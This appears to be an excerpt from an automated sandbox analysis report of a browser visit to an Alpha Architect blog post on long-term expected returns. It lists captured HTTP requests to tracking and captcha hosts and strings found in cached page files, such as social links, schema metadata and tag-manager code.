"Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lidid=4b4a4cc1-91da-422c-af69-95355dc4fc30
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=3ebc0ed4-fc0f-44fd-9c47-0f20e0dde668%252Chttps%25253A%25252F%25252Fa.clickcertain.com%25252Fpx%25252Fta%25252F%25253Fdone%25253Dtrue%252526ta_id%25253D3ebc0ed4-fc0f-44fd-9c47-0f20e0dde668%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /c/fe8bf5a16a9db504f8aba2aec3f8f5eb2c013bd8a80f6268abbae03fe760d754/hsw.js HTTP/1.1Host: newassets.hcaptcha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://newassets.hcaptcha.com/captcha/v1/b4956db/static/hcaptcha.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /checksiteconfig?v=b4956db&host=alphaarchitect.com&sitekey=ed3e0640-f796-48d4-b830-0b3669decd80&sc=1&swa=1&spst=1 HTTP/1.1Host: api2.hcaptcha.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=0H28vk2VKwPbLoawFincekpozDKK5F2cpeiX52HYH6u
Source: global trafficHTTP traffic detected: GET /checksiteconfig?v=b4956db&host=alphaarchitect.com&sitekey=ed3e0640-f796-48d4-b830-0b3669decd80&sc=1&swa=1&spst=1 HTTP/1.1Host: api.hcaptcha.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /NGNU7k9BN4dQQW7cAld4zEcXMZ4WWXaPWgI4l04GC4hEQXjMRkFuzF8MMpZNCi2CXggwgFEFLZpSBj+bFh4= HTTP/1.1Host: pluralism.themancav.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ijOKmPER6fHuEbCqvAemuvlH7+ioCaj0613u8eRU1f7jX++6phH4urAR+uDlWajl HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /checksiteconfig?v=b4956db&host=alphaarchitect.com&sitekey=ed3e0640-f796-48d4-b830-0b3669decd80&sc=1&swa=1&spst=1 HTTP/1.1Host: api2.hcaptcha.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=0H28vk2VKwPbLoawFincekpozDKK5F2cpeiX52HYH6u
Source: global trafficHTTP traffic detected: GET /812BPoh/4leXf7sMxWmtHIAp5E7RZ6NSkjPlV5063k2HPPVN0XGjTYd/uw/ff/McyX/tVZ5//A== HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ijOKmPER6fHuEbCqvAemuvlH7+ioCaj0613u8eRU1f7jX++6phH4urAR+uDlWajl HTTP/1.1Host: pluralism.themancav.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /812BPoh/4leXf7sMxWmtHIAp5E7RZ6NSkjPlV5063k2HPPVN0XGjTYd/uw/ff/McyX/tVZ5//A== HTTP/1.1Host: pluralism.themancav.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /NpKLjU2w6ORSsLG/AKanr0Xm7v0UqKnhV/zv5Fj11P5C8//+FL6p/kKwsb8asPmvDLDz+kz25edY/eP/RuD94lroqfA= HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /iZn9gPK7nuntu8eyv63RovrtmPCro9/s6PeZ6ef+ovP9+Inzq7Xf8/27x7Olu4+is7uM+uHpl/Lh8pLv4buA HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /iZn9gPK7nuntu8eyv63RovrtmPCro9/s6PeZ6ef+ovP9+Inzq7Xf8/27x7Olu4+is7uM+uHpl/Lh8pLv4buA HTTP/1.1Host: pluralism.themancav.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /NpKLjU2w6ORSsLG/AKanr0Xm7v0UqKnhV/zv5Fj11P5C8//+FL6p/kKwsb8asPmvDLDz+kz25edY/eP/RuD94lroqfA= HTTP/1.1Host: pluralism.themancav.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_163.2.drString found in binary or memory: <a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" href="https://www.facebook.com/alphaarchitect" data-placement="top" data-title="Facebook" data-toggle="tooltip" data-original-title="" title="Facebook" aria-label="Facebook" rel="nofollow noopener noreferrer" target="_self" style="font-size:16px;color:#bebdbd;"></a> equals www.facebook.com (Facebook)
Source: chromecache_163.2.drString found in binary or memory: <a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" href="https://www.linkedin.com/company/alphaarchitectllc" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" data-original-title="" title="LinkedIn" aria-label="LinkedIn" rel="nofollow noopener noreferrer" target="_self" style="font-size:16px;color:#bebdbd;"></a> equals www.linkedin.com (Linkedin)
Source: chromecache_163.2.drString found in binary or memory: <a class="fusion-social-network-icon fusion-tooltip fusion-youtube awb-icon-youtube" href="https://www.youtube.com/alphaarchitect" data-placement="top" data-title="Youtube" data-toggle="tooltip" data-original-title="" title="YouTube" aria-label="YouTube" rel="nofollow noopener noreferrer" target="_self" style="font-size:16px;color:#bebdbd;"></a> equals www.youtube.com (Youtube)
Source: chromecache_163.2.drString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/alphaarchitect" /> equals www.facebook.com (Facebook)
Source: chromecache_163.2.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#article","isPartOf":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/"},"author":{"name":"Elisabetta Basilico, PhD, CFA","@id":"https://alphaarchitect.com/#/schema/person/e8282a8635fe5e9327df61e89b0e36ad"},"headline":"Estimating Long-Term Expected Returns","datePublished":"2024-12-16T16:04:00+00:00","dateModified":"2024-12-16T17:16:08+00:00","mainEntityOfPage":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/"},"wordCount":869,"publisher":{"@id":"https://alphaarchitect.com/#organization"},"image":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"thumbnailUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","articleSection":["Elisabetta Basilico","Research Insights","Academic Research Insight","Other Insights","Macroeconomics Research"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/","url":"https://alphaarchitect.com/2024/12/long-term-expected-returns/","name":"Long-term expected returns: what the best way to forecast?","isPartOf":{"@id":"https://alphaarchitect.com/#website"},"primaryImageOfPage":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"image":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"thumbnailUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","datePublished":"2024-12-16T16:04:00+00:00","dateModified":"2024-12-16T17:16:08+00:00","description":"This blog examines hot to improve the gap in financial forecasting by improving the accuracy of long-term expected return (E(R)) predictions.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://alphaarchitect.com/2024/12/long-term-expected-returns/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage","url":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","contentUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","width":657,"height":667},{"@type":"WebSite","@id":"https://alphaarchitect.com/#website","url":"https://alphaarchitect.com/","name":"Alpha Architect","description":"We Empower Investors Through Education","publisher":{"@id":"https://alphaarchitect.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://alphaarchitect.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"sea
Source: chromecache_163.2.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#article","isPartOf":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/"},"author":{"name":"Elisabetta Basilico, PhD, CFA","@id":"https://alphaarchitect.com/#/schema/person/e8282a8635fe5e9327df61e89b0e36ad"},"headline":"Estimating Long-Term Expected Returns","datePublished":"2024-12-16T16:04:00+00:00","dateModified":"2024-12-16T17:16:08+00:00","mainEntityOfPage":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/"},"wordCount":869,"publisher":{"@id":"https://alphaarchitect.com/#organization"},"image":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"thumbnailUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","articleSection":["Elisabetta Basilico","Research Insights","Academic Research Insight","Other Insights","Macroeconomics Research"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/","url":"https://alphaarchitect.com/2024/12/long-term-expected-returns/","name":"Long-term expected returns: what the best way to forecast?","isPartOf":{"@id":"https://alphaarchitect.com/#website"},"primaryImageOfPage":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"image":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"thumbnailUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","datePublished":"2024-12-16T16:04:00+00:00","dateModified":"2024-12-16T17:16:08+00:00","description":"This blog examines hot to improve the gap in financial forecasting by improving the accuracy of long-term expected return (E(R)) predictions.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://alphaarchitect.com/2024/12/long-term-expected-returns/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage","url":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","contentUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","width":657,"height":667},{"@type":"WebSite","@id":"https://alphaarchitect.com/#website","url":"https://alphaarchitect.com/","name":"Alpha Architect","description":"We Empower Investors Through Education","publisher":{"@id":"https://alphaarchitect.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://alphaarchitect.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"sea
Source: chromecache_163.2.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#article","isPartOf":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/"},"author":{"name":"Elisabetta Basilico, PhD, CFA","@id":"https://alphaarchitect.com/#/schema/person/e8282a8635fe5e9327df61e89b0e36ad"},"headline":"Estimating Long-Term Expected Returns","datePublished":"2024-12-16T16:04:00+00:00","dateModified":"2024-12-16T17:16:08+00:00","mainEntityOfPage":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/"},"wordCount":869,"publisher":{"@id":"https://alphaarchitect.com/#organization"},"image":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"thumbnailUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","articleSection":["Elisabetta Basilico","Research Insights","Academic Research Insight","Other Insights","Macroeconomics Research"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/","url":"https://alphaarchitect.com/2024/12/long-term-expected-returns/","name":"Long-term expected returns: what the best way to forecast?","isPartOf":{"@id":"https://alphaarchitect.com/#website"},"primaryImageOfPage":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"image":{"@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage"},"thumbnailUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","datePublished":"2024-12-16T16:04:00+00:00","dateModified":"2024-12-16T17:16:08+00:00","description":"This blog examines hot to improve the gap in financial forecasting by improving the accuracy of long-term expected return (E(R)) predictions.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://alphaarchitect.com/2024/12/long-term-expected-returns/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://alphaarchitect.com/2024/12/long-term-expected-returns/#primaryimage","url":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","contentUrl":"https://alphaarchitect.com/wp-content/uploads/2024/12/2024-12-09-14_34_03-Estimating-Long-Term-Expected-Returns.png","width":657,"height":667},{"@type":"WebSite","@id":"https://alphaarchitect.com/#website","url":"https://alphaarchitect.com/","name":"Alpha Architect","description":"We Empower Investors Through Education","publisher":{"@id":"https://alphaarchitect.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://alphaarchitect.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"sea
Source: chromecache_163.2.drString found in binary or memory: </div></div></div><div class="fusion-layout-column fusion_builder_column fusion-builder-column-12 fusion_builder_column_2_5 2_5 fusion-flex-column fusion-flex-align-self-stretch" style="--awb-bg-size:cover;--awb-width-large:40%;--awb-margin-top-large:0px;--awb-spacing-right-large:4.8%;--awb-margin-bottom-large:0px;--awb-spacing-left-large:4.8%;--awb-width-medium:100%;--awb-order-medium:0;--awb-spacing-right-medium:1.92%;--awb-spacing-left-medium:1.92%;--awb-width-small:100%;--awb-order-small:0;--awb-spacing-right-small:1.92%;--awb-spacing-left-small:1.92%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-center fusion-content-layout-column"><div class="fusion-social-links fusion-social-links-2" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-alignment:right;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:var(--awb-color2);--awb-box-colors-hover:var(--awb-color1);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks color-type-custom"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-twitter awb-icon-twitter" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="X" data-toggle="tooltip" title="X" aria-label="twitter" target="_blank" rel="noopener noreferrer nofollow" href="https://twitter.com/alphaarchitect"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer nofollow" href="https://www.linkedin.com/in/alphaarchitect/detail/recent-activity/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-youtube awb-icon-youtube" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="YouTube" data-toggle="tooltip" title="YouTube" aria-label="youtube" target="_blank" rel="noopener noreferrer nofollow" href="https://www.youtube.com/alphaarchitect"></a><a class="fusion-social-network-icon fusion-tooltip fusion-mail awb-icon-mail" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="Email" data-toggle="tooltip" title="Email" aria-label="mail" target="_blank" rel="noopener noreferrer nofollow" href="https://alphaarchitect.com/subscribe/"></a></div></div></div></div></div></div></div> equals www.linkedin.com (Linkedin)
Source: chromecache_163.2.drString found in binary or memory: </div></div></div><div class="fusion-layout-column fusion_builder_column fusion-builder-column-12 fusion_builder_column_2_5 2_5 fusion-flex-column fusion-flex-align-self-stretch" style="--awb-bg-size:cover;--awb-width-large:40%;--awb-margin-top-large:0px;--awb-spacing-right-large:4.8%;--awb-margin-bottom-large:0px;--awb-spacing-left-large:4.8%;--awb-width-medium:100%;--awb-order-medium:0;--awb-spacing-right-medium:1.92%;--awb-spacing-left-medium:1.92%;--awb-width-small:100%;--awb-order-small:0;--awb-spacing-right-small:1.92%;--awb-spacing-left-small:1.92%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-center fusion-content-layout-column"><div class="fusion-social-links fusion-social-links-2" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-alignment:right;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:var(--awb-color2);--awb-box-colors-hover:var(--awb-color1);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks color-type-custom"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-twitter awb-icon-twitter" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="X" data-toggle="tooltip" title="X" aria-label="twitter" target="_blank" rel="noopener noreferrer nofollow" href="https://twitter.com/alphaarchitect"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer nofollow" href="https://www.linkedin.com/in/alphaarchitect/detail/recent-activity/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-youtube awb-icon-youtube" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="YouTube" data-toggle="tooltip" title="YouTube" aria-label="youtube" target="_blank" rel="noopener noreferrer nofollow" href="https://www.youtube.com/alphaarchitect"></a><a class="fusion-social-network-icon fusion-tooltip fusion-mail awb-icon-mail" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="Email" data-toggle="tooltip" title="Email" aria-label="mail" target="_blank" rel="noopener noreferrer nofollow" href="https://alphaarchitect.com/subscribe/"></a></div></div></div></div></div></div></div> equals www.twitter.com (Twitter)
Source: chromecache_163.2.drString found in binary or memory: </div></div></div><div class="fusion-layout-column fusion_builder_column fusion-builder-column-12 fusion_builder_column_2_5 2_5 fusion-flex-column fusion-flex-align-self-stretch" style="--awb-bg-size:cover;--awb-width-large:40%;--awb-margin-top-large:0px;--awb-spacing-right-large:4.8%;--awb-margin-bottom-large:0px;--awb-spacing-left-large:4.8%;--awb-width-medium:100%;--awb-order-medium:0;--awb-spacing-right-medium:1.92%;--awb-spacing-left-medium:1.92%;--awb-width-small:100%;--awb-order-small:0;--awb-spacing-right-small:1.92%;--awb-spacing-left-small:1.92%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-center fusion-content-layout-column"><div class="fusion-social-links fusion-social-links-2" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-alignment:right;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:var(--awb-color2);--awb-box-colors-hover:var(--awb-color1);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks color-type-custom"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-twitter awb-icon-twitter" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="X" data-toggle="tooltip" title="X" aria-label="twitter" target="_blank" rel="noopener noreferrer nofollow" href="https://twitter.com/alphaarchitect"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer nofollow" href="https://www.linkedin.com/in/alphaarchitect/detail/recent-activity/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-youtube awb-icon-youtube" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="YouTube" data-toggle="tooltip" title="YouTube" aria-label="youtube" target="_blank" rel="noopener noreferrer nofollow" href="https://www.youtube.com/alphaarchitect"></a><a class="fusion-social-network-icon fusion-tooltip fusion-mail awb-icon-mail" style="color:var(--awb-color1);font-size:16px;" data-placement="top" data-title="Email" data-toggle="tooltip" title="Email" aria-label="mail" target="_blank" rel="noopener noreferrer nofollow" href="https://alphaarchitect.com/subscribe/"></a></div></div></div></div></div></div></div> equals www.youtube.com (Youtube)
Source: chromecache_163.2.drString found in binary or memory: <li><a href="//www.youtube.com/watch?v=xRwycniPGyY" target="_blank">How We Got Started (Video)</a> equals www.youtube.com (Youtube)
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Ik:function(){e=nb()},Gd:function(){d()}}};var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
Source: chromecache_162.2.dr, chromecache_324.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Hh:e,Fh:f,Gh:g,mi:k,ni:m,Xe:n,Jb:b},q=A.YT;if(q)return q.ready&&q.ready(d),b;var r=A.onYouTubeIframeAPIReady;A.onYouTubeIframeAPIReady=function(){r&&r();d()};G(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(hE(w,"iframe_api")||hE(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,B=0;B<y;B++)if(!ZD&&fE(x[B],p.Xe))return lc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_163.2.drString found in binary or memory: var fusionLightboxVars = {"status_lightbox":"1","lightbox_gallery":"1","lightbox_skin":"metro-white","lightbox_title":"1","lightbox_arrows":"1","lightbox_slideshow_speed":"5000","lightbox_autoplay":"","lightbox_opacity":"0.90","lightbox_desc":"","lightbox_social":"1","lightbox_social_links":{"facebook":{"source":"https:\/\/www.facebook.com\/sharer.php?u={URL}","text":"Share on Facebook"},"twitter":{"source":"https:\/\/x.com\/intent\/post?turl={URL}","text":"Share on X"},"linkedin":{"source":"https:\/\/www.linkedin.com\/shareArticle?mini=true&url={URL}","text":"Share on LinkedIn"},"mail":{"source":"mailto:?body={URL}","text":"Share by Email"}},"lightbox_deeplinking":"1","lightbox_path":"vertical","lightbox_post_images":"1","lightbox_animation_speed":"normal","l10n":{"close":"Press Esc to close","enterFullscreen":"Enter Fullscreen (Shift+Enter)","exitFullscreen":"Exit Fullscreen (Shift+Enter)","slideShow":"Slideshow","next":"Next","previous":"Previous"}}; equals www.facebook.com 